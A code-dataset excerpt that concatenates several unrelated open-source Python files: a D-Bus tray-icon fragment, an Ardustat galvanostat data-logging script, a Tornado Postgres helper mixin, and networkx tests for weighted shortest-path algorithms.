self.notifier.activated.emit(QSystemTrayIcon.MiddleClick)
@dbus_method(IFACE, in_signature='ii', out_signature='')
def SecondaryActivate(self, x, y):
self.notifier.activated.emit(QSystemTrayIcon.MiddleClick)
@dbus_method(IFACE, in_signature='is', out_signature='')
def Scroll(self, delta, orientation):
pass
@dbus_signal(IFACE, '')
def NewTitle(self):
pass
@dbus_signal(IFACE, '')
def NewIcon(self):
pass
@dbus_signal(IFACE, '')
def NewAttentionIcon(self):
pass
@dbus_signal(IFACE, '')
def NewOverlayIcon(self):
pass
@dbus_signal(IFACE, '')
def NewToolTip(self):
pass
@dbus_signal(IFACE, 's')
def NewStatus(self, status):
pass
| gpl-3.0 | -3,887,124,722,416,218,000 | 29.407563 | 115 | 0.637833 | false |
kjiang8/Ardustat | Deprecated_Unsupported/Python_Client/galvanostat_with_connect.py | 1 | 1837 | import numpy
import ardustat_library_simple as ard
import time
import subprocess
import os
import glob
import sys
##Guess a serial port
port = ""
if os.name == "posix":
#try os x
if len(glob.glob("/dev/tty.u*")) > 0:
port = glob.glob("/dev/tty.u*")[0]
elif len(glob.glob("/dev/ttyUSB*")) > 0:
port = glob.glob("/dev/ttyUSB*")[0]
else:
print "can't see any ardustats. PEACE."
sys.exit()
print port
#start a serial forwarder
p = subprocess.Popen(("python tcp_serial_redirect.py "+port+" 57600").split())
print "waiting"
time.sleep(5)
print "going"
#set parameters
read_delay = .5 #second
ardustat_id = 21
file_name = "galvanostat_test"
ardustat_socket = 7777
debug = False
pulse_time = 60*60*10
#Below here no touchy
#connect to to ardustat and setup resistance table
a = ard.ardustat()
a.connect(ardustat_socket)
a.debug = debug
a.load_resistance_table(ardustat_id)
a.ocv()
a.groundvalue = 4
a.moveground()
time.sleep(.2)
a.ocv()
#create arrays + a function for logging data
times = []
potential = []
current = []
time_start = time.time()
cycle = 0
file_name = file_name+"_"+str(int(time_start))+".dat"
def appender(reading):
if reading['valid']:
		print reading['cell_ADC'],reading['current']
tdiff = str(time.time()-time_start)
		out = tdiff+","+str(reading['cell_ADC'])+","+str(reading['current'])+","+str(cycle)+"\n"
open(file_name,"a").write(out)
else:
print "bad read"
#Step through values
output = 0
a.ocv()
for i in range(0,20):
time.sleep(.1)
read = a.parsedread()
appender(read)
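# Baseline OCV readings captured; now apply a small constant discharge current
# and keep logging until pulse_time elapses.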
start_pulse = time.time()
a.galvanostat(-0.001)
while (time.time()- start_pulse) < pulse_time:
time.sleep(read_delay)
read = a.parsedread()
appender(read)
start_pulse = time.time()
a.ocv()
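# Back at open circuit: log the relaxation for another 600 seconds.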
while (time.time()- start_pulse) < 600:
time.sleep(read_delay)
read = a.parsedread()
appender(read)
p.kill()
| bsd-2-clause | 1,281,744,079,879,438,600 | 17.938144 | 87 | 0.672836 | false |
manhg/tokit | tokit/postgres.py | 1 | 4462 | import logging
import shortuuid
import uuid
import momoko
import momoko.exceptions
import psycopg2
from psycopg2.extras import DictCursor, DictRow, register_uuid
import psycopg2.extensions
from tornado.gen import coroutine, sleep
from tornado.web import HTTPError
import tokit
logger = tokit.logger
class DictLogCursor(DictCursor):
def execute(self, sql, args=None):
        logger.debug('Execute SQL: %s', self.mogrify(sql, args).decode())
return super().execute(sql, args)
@tokit.on('init')
def pg_init(app):
""" Hook to init Postgres momoko driver.
    dsn config is required, with the same syntax as a Psycopg2 DSN.
Sample env.ini::
[postgres]
dsn=dbname=[APP_NAME]
size=2
"""
env = app.config.env['postgres']
if env.getboolean('log_momoko'):
logging.getLogger('momoko').setLevel(logger.getEffectiveLevel())
momoko_opts = dict(
dsn=env['dsn'],
size=int(env['size']),
max_size=int(env['max_size']),
auto_shrink=env.getboolean('auto_shrink'),
cursor_factory=(DictLogCursor if env.getboolean('log') else DictCursor),
# connection_factory=env.get('connection_factory', None),
)
register_uuid()
app.pg_db = momoko.Pool(**momoko_opts)
try:
app.pg_db.connect()
except momoko.PartiallyConnectedError:
logger.error('Cannot connect')
class PgMixin:
DbIntegrityError = psycopg2.IntegrityError
DbError = psycopg2.Error
@property
def db(self):
return self.application.pg_db
@coroutine
def pg_insert(self, table, fields=None, **data):
"""
        Postgres shortcut to insert data
:return int new row's id
Example::
user_id = yield self.pg_insert('users', {"username": "foo", "password": "secret"})
"""
if fields:
data = self.get_request_dict(*fields)
else:
fields = list(data.keys())
assert len(data) > 0 # check data
values = list(data.values())
sql = 'INSERT INTO {} ({}) VALUES ({}) RETURNING id ' \
.format(table,
','.join(fields),
','.join(['%s'] * len(fields))
)
cursor = yield self.pg_query(sql, *values)
return cursor.fetchone()[0]
@coroutine
def pg_getconn(self):
try:
connection = yield self.db.getconn()
return connection
except psycopg2.OperationalError:
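            # The pooled connection was lost; reconnect the pool and retry once
            # before giving up with a 503.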
yield self.db.connect()
yield sleep(0.5)
try:
connection = yield self.db.getconn()
return connection
except:
raise HTTPError(503, "Database unavailable")
except (momoko.Pool.DatabaseNotAvailable, momoko.exceptions.PartiallyConnectedError):
raise HTTPError(503, "Database unavailable")
@coroutine
def pg_update(self, table, data):
id_value = data.pop('id')
changes = [field + ' = %s' for field in data.keys()]
sql = 'UPDATE {} SET {} WHERE id = %s'.format(table, ','.join(changes))
values = list(data.values()) + [id_value]
cursor = yield self.pg_query(sql, *values)
return cursor
@coroutine
def pg_query(self, query, *params):
""" Low level execuation """
connection = yield self.pg_getconn()
with self.db.manage(connection):
cursor = yield connection.execute(query, params)
return cursor
def pg_serialize(self, row):
if not row:
return
ret = dict(row) if isinstance(row, DictRow) else row
return ret
@coroutine
def pg_select(self, query, *params):
"""
Query and convert each returned row
:return generator
"""
result = yield self.pg_query(query, *params)
return (self.pg_serialize(row) for row in result.fetchall())
@coroutine
def pg_one(self, query, *params):
result = yield self.pg_query(query, *params)
row = result.fetchone()
if row:
return self.pg_serialize(row)
db_insert = pg_insert
db_update = pg_update
db_query = pg_query
db_select = pg_select
db_one = pg_one
class UidMixin:
def pg_serialize(self, row):
ret = PgMixin.pg_serialize(self, row)
if 'id' in ret:
ret['short_id'] = shortuuid.encode(ret['id'])
return ret
| mit | 4,795,081,817,502,400,000 | 27.240506 | 94 | 0.586732 | false |
sserrot/champion_relationships | venv/Lib/site-packages/networkx/algorithms/shortest_paths/tests/test_weighted.py | 1 | 27666 |
import pytest
import networkx as nx
from networkx.utils import pairwise
def validate_path(G, s, t, soln_len, path):
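    # A correct result starts at s, ends at t, and its recomputed weight equals
    # soln_len (using the cheapest parallel edge when G is a multigraph).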
assert path[0] == s
assert path[-1] == t
if not G.is_multigraph():
computed = sum(G[u][v].get('weight', 1) for u, v in pairwise(path))
assert soln_len == computed
else:
computed = sum(min(e.get('weight', 1) for e in G[u][v].values())
for u, v in pairwise(path))
assert soln_len == computed
def validate_length_path(G, s, t, soln_len, length, path):
assert soln_len == length
validate_path(G, s, t, length, path)
class WeightedTestBase(object):
"""Base class for test classes that test functions for computing
shortest paths in weighted graphs.
"""
def setup(self):
"""Creates some graphs for use in the unit tests."""
cnlti = nx.convert_node_labels_to_integers
self.grid = cnlti(nx.grid_2d_graph(4, 4), first_label=1,
ordering="sorted")
self.cycle = nx.cycle_graph(7)
self.directed_cycle = nx.cycle_graph(7, create_using=nx.DiGraph())
self.XG = nx.DiGraph()
self.XG.add_weighted_edges_from([('s', 'u', 10), ('s', 'x', 5),
('u', 'v', 1), ('u', 'x', 2),
('v', 'y', 1), ('x', 'u', 3),
('x', 'v', 5), ('x', 'y', 2),
('y', 's', 7), ('y', 'v', 6)])
self.MXG = nx.MultiDiGraph(self.XG)
self.MXG.add_edge('s', 'u', weight=15)
self.XG2 = nx.DiGraph()
self.XG2.add_weighted_edges_from([[1, 4, 1], [4, 5, 1],
[5, 6, 1], [6, 3, 1],
[1, 3, 50], [1, 2, 100],
[2, 3, 100]])
self.XG3 = nx.Graph()
self.XG3.add_weighted_edges_from([[0, 1, 2], [1, 2, 12],
[2, 3, 1], [3, 4, 5],
[4, 5, 1], [5, 0, 10]])
self.XG4 = nx.Graph()
self.XG4.add_weighted_edges_from([[0, 1, 2], [1, 2, 2],
[2, 3, 1], [3, 4, 1],
[4, 5, 1], [5, 6, 1],
[6, 7, 1], [7, 0, 1]])
self.MXG4 = nx.MultiGraph(self.XG4)
self.MXG4.add_edge(0, 1, weight=3)
self.G = nx.DiGraph() # no weights
self.G.add_edges_from([('s', 'u'), ('s', 'x'),
('u', 'v'), ('u', 'x'),
('v', 'y'), ('x', 'u'),
('x', 'v'), ('x', 'y'),
('y', 's'), ('y', 'v')])
class TestWeightedPath(WeightedTestBase):
def test_dijkstra(self):
(D, P) = nx.single_source_dijkstra(self.XG, 's')
validate_path(self.XG, 's', 'v', 9, P['v'])
assert D['v'] == 9
validate_path(
self.XG, 's', 'v', 9, nx.single_source_dijkstra_path(self.XG, 's')['v'])
assert dict(
nx.single_source_dijkstra_path_length(self.XG, 's'))['v'] == 9
validate_path(
self.XG, 's', 'v', 9, nx.single_source_dijkstra(self.XG, 's')[1]['v'])
validate_path(
self.MXG, 's', 'v', 9, nx.single_source_dijkstra_path(self.MXG, 's')['v'])
GG = self.XG.to_undirected()
# make sure we get lower weight
# to_undirected might choose either edge with weight 2 or weight 3
GG['u']['x']['weight'] = 2
(D, P) = nx.single_source_dijkstra(GG, 's')
validate_path(GG, 's', 'v', 8, P['v'])
assert D['v'] == 8 # uses lower weight of 2 on u<->x edge
validate_path(GG, 's', 'v', 8, nx.dijkstra_path(GG, 's', 'v'))
assert nx.dijkstra_path_length(GG, 's', 'v') == 8
validate_path(self.XG2, 1, 3, 4, nx.dijkstra_path(self.XG2, 1, 3))
validate_path(self.XG3, 0, 3, 15, nx.dijkstra_path(self.XG3, 0, 3))
assert nx.dijkstra_path_length(self.XG3, 0, 3) == 15
validate_path(self.XG4, 0, 2, 4, nx.dijkstra_path(self.XG4, 0, 2))
assert nx.dijkstra_path_length(self.XG4, 0, 2) == 4
validate_path(self.MXG4, 0, 2, 4, nx.dijkstra_path(self.MXG4, 0, 2))
validate_path(
self.G, 's', 'v', 2, nx.single_source_dijkstra(self.G, 's', 'v')[1])
validate_path(
self.G, 's', 'v', 2, nx.single_source_dijkstra(self.G, 's')[1]['v'])
validate_path(self.G, 's', 'v', 2, nx.dijkstra_path(self.G, 's', 'v'))
assert nx.dijkstra_path_length(self.G, 's', 'v') == 2
# NetworkXError: node s not reachable from moon
pytest.raises(nx.NetworkXNoPath, nx.dijkstra_path, self.G, 's', 'moon')
pytest.raises(
nx.NetworkXNoPath, nx.dijkstra_path_length, self.G, 's', 'moon')
validate_path(self.cycle, 0, 3, 3, nx.dijkstra_path(self.cycle, 0, 3))
validate_path(self.cycle, 0, 4, 3, nx.dijkstra_path(self.cycle, 0, 4))
assert nx.single_source_dijkstra(self.cycle, 0, 0) == (0, [0])
def test_bidirectional_dijkstra(self):
validate_length_path(
self.XG, 's', 'v', 9, *nx.bidirectional_dijkstra(self.XG, 's', 'v'))
validate_length_path(
self.G, 's', 'v', 2, *nx.bidirectional_dijkstra(self.G, 's', 'v'))
validate_length_path(
self.cycle, 0, 3, 3, *nx.bidirectional_dijkstra(self.cycle, 0, 3))
validate_length_path(
self.cycle, 0, 4, 3, *nx.bidirectional_dijkstra(self.cycle, 0, 4))
validate_length_path(
self.XG3, 0, 3, 15, *nx.bidirectional_dijkstra(self.XG3, 0, 3))
validate_length_path(
self.XG4, 0, 2, 4, *nx.bidirectional_dijkstra(self.XG4, 0, 2))
# need more tests here
P = nx.single_source_dijkstra_path(self.XG, 's')['v']
validate_path(self.XG, 's', 'v', sum(self.XG[u][v]['weight'] for u, v in zip(
P[:-1], P[1:])), nx.dijkstra_path(self.XG, 's', 'v'))
# check absent source
G = nx.path_graph(2)
pytest.raises(nx.NodeNotFound, nx.bidirectional_dijkstra, G, 3, 0)
def test_bidirectional_dijkstra_no_path(self):
with pytest.raises(nx.NetworkXNoPath):
G = nx.Graph()
nx.add_path(G, [1, 2, 3])
nx.add_path(G, [4, 5, 6])
path = nx.bidirectional_dijkstra(G, 1, 6)
def test_absent_source(self):
# the check is in _dijkstra_multisource, but this will provide
# regression testing against later changes to any of the "client"
# Dijkstra or Bellman-Ford functions
G = nx.path_graph(2)
for fn in (nx.dijkstra_path,
nx.dijkstra_path_length,
nx.single_source_dijkstra_path,
nx.single_source_dijkstra_path_length,
nx.single_source_dijkstra,
nx.dijkstra_predecessor_and_distance,):
pytest.raises(nx.NodeNotFound, fn, G, 3, 0)
def test_dijkstra_predecessor1(self):
G = nx.path_graph(4)
assert (nx.dijkstra_predecessor_and_distance(G, 0) ==
({0: [], 1: [0], 2: [1], 3: [2]}, {0: 0, 1: 1, 2: 2, 3: 3}))
def test_dijkstra_predecessor2(self):
# 4-cycle
G = nx.Graph([(0, 1), (1, 2), (2, 3), (3, 0)])
pred, dist = nx.dijkstra_predecessor_and_distance(G, (0))
assert pred[0] == []
assert pred[1] == [0]
assert pred[2] in [[1, 3], [3, 1]]
assert pred[3] == [0]
assert dist == {0: 0, 1: 1, 2: 2, 3: 1}
def test_dijkstra_predecessor3(self):
XG = nx.DiGraph()
XG.add_weighted_edges_from([('s', 'u', 10), ('s', 'x', 5),
('u', 'v', 1), ('u', 'x', 2),
('v', 'y', 1), ('x', 'u', 3),
('x', 'v', 5), ('x', 'y', 2),
('y', 's', 7), ('y', 'v', 6)])
(P, D) = nx.dijkstra_predecessor_and_distance(XG, 's')
assert P['v'] == ['u']
assert D['v'] == 9
(P, D) = nx.dijkstra_predecessor_and_distance(XG, 's', cutoff=8)
assert not 'v' in D
def test_single_source_dijkstra_path_length(self):
pl = nx.single_source_dijkstra_path_length
assert dict(pl(self.MXG4, 0))[2] == 4
spl = pl(self.MXG4, 0, cutoff=2)
assert not 2 in spl
def test_bidirectional_dijkstra_multigraph(self):
G = nx.MultiGraph()
G.add_edge('a', 'b', weight=10)
G.add_edge('a', 'b', weight=100)
dp = nx.bidirectional_dijkstra(G, 'a', 'b')
assert dp == (10, ['a', 'b'])
def test_dijkstra_pred_distance_multigraph(self):
G = nx.MultiGraph()
G.add_edge('a', 'b', key='short', foo=5, weight=100)
G.add_edge('a', 'b', key='long', bar=1, weight=110)
p, d = nx.dijkstra_predecessor_and_distance(G, 'a')
assert p == {'a': [], 'b': ['a']}
assert d == {'a': 0, 'b': 100}
def test_negative_edge_cycle(self):
G = nx.cycle_graph(5, create_using=nx.DiGraph())
assert nx.negative_edge_cycle(G) == False
G.add_edge(8, 9, weight=-7)
G.add_edge(9, 8, weight=3)
graph_size = len(G)
assert nx.negative_edge_cycle(G) == True
assert graph_size == len(G)
pytest.raises(ValueError, nx.single_source_dijkstra_path_length, G, 8)
pytest.raises(ValueError, nx.single_source_dijkstra, G, 8)
pytest.raises(ValueError, nx.dijkstra_predecessor_and_distance, G, 8)
G.add_edge(9, 10)
pytest.raises(ValueError, nx.bidirectional_dijkstra, G, 8, 10)
def test_weight_function(self):
"""Tests that a callable weight is interpreted as a weight
function instead of an edge attribute.
"""
# Create a triangle in which the edge from node 0 to node 2 has
# a large weight and the other two edges have a small weight.
G = nx.complete_graph(3)
G.adj[0][2]['weight'] = 10
G.adj[0][1]['weight'] = 1
G.adj[1][2]['weight'] = 1
# The weight function will take the multiplicative inverse of
# the weights on the edges. This way, weights that were large
# before now become small and vice versa.
def weight(u, v, d): return 1 / d['weight']
# The shortest path from 0 to 2 using the actual weights on the
# edges should be [0, 1, 2].
distance, path = nx.single_source_dijkstra(G, 0, 2)
assert distance == 2
assert path == [0, 1, 2]
# However, with the above weight function, the shortest path
# should be [0, 2], since that has a very small weight.
distance, path = nx.single_source_dijkstra(G, 0, 2, weight=weight)
assert distance == 1 / 10
assert path == [0, 2]
def test_all_pairs_dijkstra_path(self):
cycle = nx.cycle_graph(7)
p = dict(nx.all_pairs_dijkstra_path(cycle))
assert p[0][3] == [0, 1, 2, 3]
cycle[1][2]['weight'] = 10
p = dict(nx.all_pairs_dijkstra_path(cycle))
assert p[0][3] == [0, 6, 5, 4, 3]
def test_all_pairs_dijkstra_path_length(self):
cycle = nx.cycle_graph(7)
pl = dict(nx.all_pairs_dijkstra_path_length(cycle))
assert pl[0] == {0: 0, 1: 1, 2: 2, 3: 3, 4: 3, 5: 2, 6: 1}
cycle[1][2]['weight'] = 10
pl = dict(nx.all_pairs_dijkstra_path_length(cycle))
assert pl[0] == {0: 0, 1: 1, 2: 5, 3: 4, 4: 3, 5: 2, 6: 1}
def test_all_pairs_dijkstra(self):
cycle = nx.cycle_graph(7)
out = dict(nx.all_pairs_dijkstra(cycle))
assert out[0][0] == {0: 0, 1: 1, 2: 2, 3: 3, 4: 3, 5: 2, 6: 1}
assert out[0][1][3] == [0, 1, 2, 3]
cycle[1][2]['weight'] = 10
out = dict(nx.all_pairs_dijkstra(cycle))
assert out[0][0] == {0: 0, 1: 1, 2: 5, 3: 4, 4: 3, 5: 2, 6: 1}
assert out[0][1][3] == [0, 6, 5, 4, 3]
class TestDijkstraPathLength(object):
"""Unit tests for the :func:`networkx.dijkstra_path_length`
function.
"""
def test_weight_function(self):
"""Tests for computing the length of the shortest path using
Dijkstra's algorithm with a user-defined weight function.
"""
# Create a triangle in which the edge from node 0 to node 2 has
# a large weight and the other two edges have a small weight.
G = nx.complete_graph(3)
G.adj[0][2]['weight'] = 10
G.adj[0][1]['weight'] = 1
G.adj[1][2]['weight'] = 1
# The weight function will take the multiplicative inverse of
# the weights on the edges. This way, weights that were large
# before now become small and vice versa.
def weight(u, v, d): return 1 / d['weight']
# The shortest path from 0 to 2 using the actual weights on the
# edges should be [0, 1, 2]. However, with the above weight
# function, the shortest path should be [0, 2], since that has a
# very small weight.
length = nx.dijkstra_path_length(G, 0, 2, weight=weight)
assert length == 1 / 10
class TestMultiSourceDijkstra(object):
"""Unit tests for the multi-source dialect of Dijkstra's shortest
path algorithms.
"""
def test_no_sources(self):
with pytest.raises(ValueError):
nx.multi_source_dijkstra(nx.Graph(), {})
def test_path_no_sources(self):
with pytest.raises(ValueError):
nx.multi_source_dijkstra_path(nx.Graph(), {})
def test_path_length_no_sources(self):
with pytest.raises(ValueError):
nx.multi_source_dijkstra_path_length(nx.Graph(), {})
def test_absent_source(self):
G = nx.path_graph(2)
for fn in (nx.multi_source_dijkstra_path,
nx.multi_source_dijkstra_path_length,
nx.multi_source_dijkstra,):
pytest.raises(nx.NodeNotFound, fn, G, [3], 0)
def test_two_sources(self):
edges = [(0, 1, 1), (1, 2, 1), (2, 3, 10), (3, 4, 1)]
G = nx.Graph()
G.add_weighted_edges_from(edges)
sources = {0, 4}
distances, paths = nx.multi_source_dijkstra(G, sources)
expected_distances = {0: 0, 1: 1, 2: 2, 3: 1, 4: 0}
expected_paths = {0: [0], 1: [0, 1], 2: [0, 1, 2], 3: [4, 3], 4: [4]}
assert distances == expected_distances
assert paths == expected_paths
def test_simple_paths(self):
G = nx.path_graph(4)
lengths = nx.multi_source_dijkstra_path_length(G, [0])
assert lengths == {n: n for n in G}
paths = nx.multi_source_dijkstra_path(G, [0])
assert paths == {n: list(range(n + 1)) for n in G}
class TestBellmanFordAndGoldbergRadzik(WeightedTestBase):
def test_single_node_graph(self):
G = nx.DiGraph()
G.add_node(0)
assert nx.single_source_bellman_ford_path(G, 0) == {0: [0]}
assert nx.single_source_bellman_ford_path_length(G, 0) == {0: 0}
assert nx.single_source_bellman_ford(G, 0) == ({0: 0}, {0: [0]})
assert nx.bellman_ford_predecessor_and_distance(G, 0) == ({0: []}, {0: 0})
assert nx.goldberg_radzik(G, 0) == ({0: None}, {0: 0})
def test_absent_source_bellman_ford(self):
# the check is in _bellman_ford; this provides regression testing
# against later changes to "client" Bellman-Ford functions
G = nx.path_graph(2)
for fn in (nx.bellman_ford_predecessor_and_distance,
nx.bellman_ford_path,
nx.bellman_ford_path_length,
nx.single_source_bellman_ford_path,
nx.single_source_bellman_ford_path_length,
nx.single_source_bellman_ford,):
pytest.raises(nx.NodeNotFound, fn, G, 3, 0)
def test_absent_source_goldberg_radzik(self):
with pytest.raises(nx.NodeNotFound):
G = nx.path_graph(2)
nx.goldberg_radzik(G, 3, 0)
def test_negative_weight_cycle(self):
G = nx.cycle_graph(5, create_using=nx.DiGraph())
G.add_edge(1, 2, weight=-7)
for i in range(5):
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path, G, i)
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path_length, G, i)
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford, G, i)
pytest.raises(nx.NetworkXUnbounded, nx.bellman_ford_predecessor_and_distance, G, i)
pytest.raises(nx.NetworkXUnbounded, nx.goldberg_radzik, G, i)
G = nx.cycle_graph(5) # undirected Graph
G.add_edge(1, 2, weight=-3)
for i in range(5):
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path, G, i)
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path_length, G, i)
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford, G, i)
pytest.raises(nx.NetworkXUnbounded, nx.bellman_ford_predecessor_and_distance, G, i)
pytest.raises(nx.NetworkXUnbounded, nx.goldberg_radzik, G, i)
G = nx.DiGraph([(1, 1, {'weight': -1})])
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path, G, 1)
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path_length, G, 1)
pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford, G, 1)
pytest.raises(nx.NetworkXUnbounded, nx.bellman_ford_predecessor_and_distance, G, 1)
pytest.raises(nx.NetworkXUnbounded, nx.goldberg_radzik, G, 1)
# no negative cycle but negative weight
G = nx.cycle_graph(5, create_using=nx.DiGraph())
G.add_edge(1, 2, weight=-3)
assert (nx.single_source_bellman_ford_path(G, 0) ==
{0: [0], 1: [0, 1], 2: [0, 1, 2], 3: [0, 1, 2, 3], 4: [0, 1, 2, 3, 4]})
assert (nx.single_source_bellman_ford_path_length(G, 0) ==
{0: 0, 1: 1, 2: -2, 3: -1, 4: 0})
assert (nx.single_source_bellman_ford(G, 0) ==
({0: 0, 1: 1, 2: -2, 3: -1, 4: 0},
{0: [0], 1: [0, 1], 2: [0, 1, 2], 3: [0, 1, 2, 3], 4: [0, 1, 2, 3, 4]}))
assert (nx.bellman_ford_predecessor_and_distance(G, 0) ==
({0: [], 1: [0], 2: [1], 3: [2], 4: [3]},
{0: 0, 1: 1, 2: -2, 3: -1, 4: 0}))
assert (nx.goldberg_radzik(G, 0) ==
({0: None, 1: 0, 2: 1, 3: 2, 4: 3},
{0: 0, 1: 1, 2: -2, 3: -1, 4: 0}))
def test_not_connected(self):
G = nx.complete_graph(6)
G.add_edge(10, 11)
G.add_edge(10, 12)
assert (nx.single_source_bellman_ford_path(G, 0) ==
{0: [0], 1: [0, 1], 2: [0, 2], 3: [0, 3], 4: [0, 4], 5: [0, 5]})
assert (nx.single_source_bellman_ford_path_length(G, 0) ==
{0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1})
assert (nx.single_source_bellman_ford(G, 0) ==
({0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1},
{0: [0], 1: [0, 1], 2: [0, 2], 3: [0, 3], 4: [0, 4], 5: [0, 5]}))
assert (nx.bellman_ford_predecessor_and_distance(G, 0) ==
({0: [], 1: [0], 2: [0], 3: [0], 4: [0], 5: [0]},
{0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1}))
assert (nx.goldberg_radzik(G, 0) ==
({0: None, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0},
{0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1}))
# not connected, with a component not containing the source that
# contains a negative cost cycle.
G = nx.complete_graph(6)
G.add_edges_from([('A', 'B', {'load': 3}),
('B', 'C', {'load': -10}),
('C', 'A', {'load': 2})])
assert (nx.single_source_bellman_ford_path(G, 0, weight='load') ==
{0: [0], 1: [0, 1], 2: [0, 2], 3: [0, 3], 4: [0, 4], 5: [0, 5]})
assert (nx.single_source_bellman_ford_path_length(G, 0, weight='load') ==
{0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1})
assert (nx.single_source_bellman_ford(G, 0, weight='load') ==
({0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1},
{0: [0], 1: [0, 1], 2: [0, 2], 3: [0, 3], 4: [0, 4], 5: [0, 5]}))
assert (nx.bellman_ford_predecessor_and_distance(G, 0, weight='load') ==
({0: [], 1: [0], 2: [0], 3: [0], 4: [0], 5: [0]},
{0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1}))
assert (nx.goldberg_radzik(G, 0, weight='load') ==
({0: None, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0},
{0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1}))
def test_multigraph(self):
assert nx.bellman_ford_path(self.MXG, 's', 'v') == ['s', 'x', 'u', 'v']
assert nx.bellman_ford_path_length(self.MXG, 's', 'v') == 9
assert nx.single_source_bellman_ford_path(self.MXG, 's')['v'] == ['s', 'x', 'u', 'v']
assert nx.single_source_bellman_ford_path_length(self.MXG, 's')['v'] == 9
D, P = nx.single_source_bellman_ford(self.MXG, 's', target='v')
assert D == 9
assert P == ['s', 'x', 'u', 'v']
P, D = nx.bellman_ford_predecessor_and_distance(self.MXG, 's')
assert P['v'] == ['u']
assert D['v'] == 9
P, D = nx.goldberg_radzik(self.MXG, 's')
assert P['v'] == 'u'
assert D['v'] == 9
assert nx.bellman_ford_path(self.MXG4, 0, 2) == [0, 1, 2]
assert nx.bellman_ford_path_length(self.MXG4, 0, 2) == 4
assert nx.single_source_bellman_ford_path(self.MXG4, 0)[2] == [0, 1, 2]
assert nx.single_source_bellman_ford_path_length(self.MXG4, 0)[2] == 4
D, P = nx.single_source_bellman_ford(self.MXG4, 0, target=2)
assert D == 4
assert P == [0, 1, 2]
P, D = nx.bellman_ford_predecessor_and_distance(self.MXG4, 0)
assert P[2] == [1]
assert D[2] == 4
P, D = nx.goldberg_radzik(self.MXG4, 0)
assert P[2] == 1
assert D[2] == 4
def test_others(self):
assert nx.bellman_ford_path(self.XG, 's', 'v') == ['s', 'x', 'u', 'v']
assert nx.bellman_ford_path_length(self.XG, 's', 'v') == 9
assert nx.single_source_bellman_ford_path(self.XG, 's')['v'] == ['s', 'x', 'u', 'v']
assert nx.single_source_bellman_ford_path_length(self.XG, 's')['v'] == 9
D, P = nx.single_source_bellman_ford(self.XG, 's', target='v')
assert D == 9
assert P == ['s', 'x', 'u', 'v']
(P, D) = nx.bellman_ford_predecessor_and_distance(self.XG, 's')
assert P['v'] == ['u']
assert D['v'] == 9
(P, D) = nx.goldberg_radzik(self.XG, 's')
assert P['v'] == 'u'
assert D['v'] == 9
def test_path_graph(self):
G = nx.path_graph(4)
assert (nx.single_source_bellman_ford_path(G, 0) ==
{0: [0], 1: [0, 1], 2: [0, 1, 2], 3: [0, 1, 2, 3]})
assert (nx.single_source_bellman_ford_path_length(G, 0) ==
{0: 0, 1: 1, 2: 2, 3: 3})
assert (nx.single_source_bellman_ford(G, 0) ==
({0: 0, 1: 1, 2: 2, 3: 3}, {0: [0], 1: [0, 1], 2: [0, 1, 2], 3: [0, 1, 2, 3]}))
assert (nx.bellman_ford_predecessor_and_distance(G, 0) ==
({0: [], 1: [0], 2: [1], 3: [2]}, {0: 0, 1: 1, 2: 2, 3: 3}))
assert (nx.goldberg_radzik(G, 0) ==
({0: None, 1: 0, 2: 1, 3: 2}, {0: 0, 1: 1, 2: 2, 3: 3}))
assert (nx.single_source_bellman_ford_path(G, 3) ==
{0: [3, 2, 1, 0], 1: [3, 2, 1], 2: [3, 2], 3: [3]})
assert (nx.single_source_bellman_ford_path_length(G, 3) ==
{0: 3, 1: 2, 2: 1, 3: 0})
assert (nx.single_source_bellman_ford(G, 3) ==
({0: 3, 1: 2, 2: 1, 3: 0}, {0: [3, 2, 1, 0], 1: [3, 2, 1], 2: [3, 2], 3: [3]}))
assert (nx.bellman_ford_predecessor_and_distance(G, 3) ==
({0: [1], 1: [2], 2: [3], 3: []}, {0: 3, 1: 2, 2: 1, 3: 0}))
assert (nx.goldberg_radzik(G, 3) ==
({0: 1, 1: 2, 2: 3, 3: None}, {0: 3, 1: 2, 2: 1, 3: 0}))
def test_4_cycle(self):
# 4-cycle
G = nx.Graph([(0, 1), (1, 2), (2, 3), (3, 0)])
dist, path = nx.single_source_bellman_ford(G, 0)
assert dist == {0: 0, 1: 1, 2: 2, 3: 1}
assert path[0] == [0]
assert path[1] == [0, 1]
assert path[2] in [[0, 1, 2], [0, 3, 2]]
assert path[3] == [0, 3]
pred, dist = nx.bellman_ford_predecessor_and_distance(G, 0)
assert pred[0] == []
assert pred[1] == [0]
assert pred[2] in [[1, 3], [3, 1]]
assert pred[3] == [0]
assert dist == {0: 0, 1: 1, 2: 2, 3: 1}
pred, dist = nx.goldberg_radzik(G, 0)
assert pred[0] == None
assert pred[1] == 0
assert pred[2] in [1, 3]
assert pred[3] == 0
assert dist == {0: 0, 1: 1, 2: 2, 3: 1}
def test_negative_weight(self):
G = nx.DiGraph()
G.add_nodes_from('abcd')
G.add_edge('a','d', weight = 0)
G.add_edge('a','b', weight = 1)
G.add_edge('b','c', weight = -3)
G.add_edge('c','d', weight = 1)
assert nx.bellman_ford_path(G, 'a', 'd') == ['a', 'b', 'c', 'd']
assert nx.bellman_ford_path_length(G, 'a', 'd') == -1
class TestJohnsonAlgorithm(WeightedTestBase):
def test_single_node_graph(self):
with pytest.raises(nx.NetworkXError):
G = nx.DiGraph()
G.add_node(0)
nx.johnson(G)
def test_negative_cycle(self):
G = nx.DiGraph()
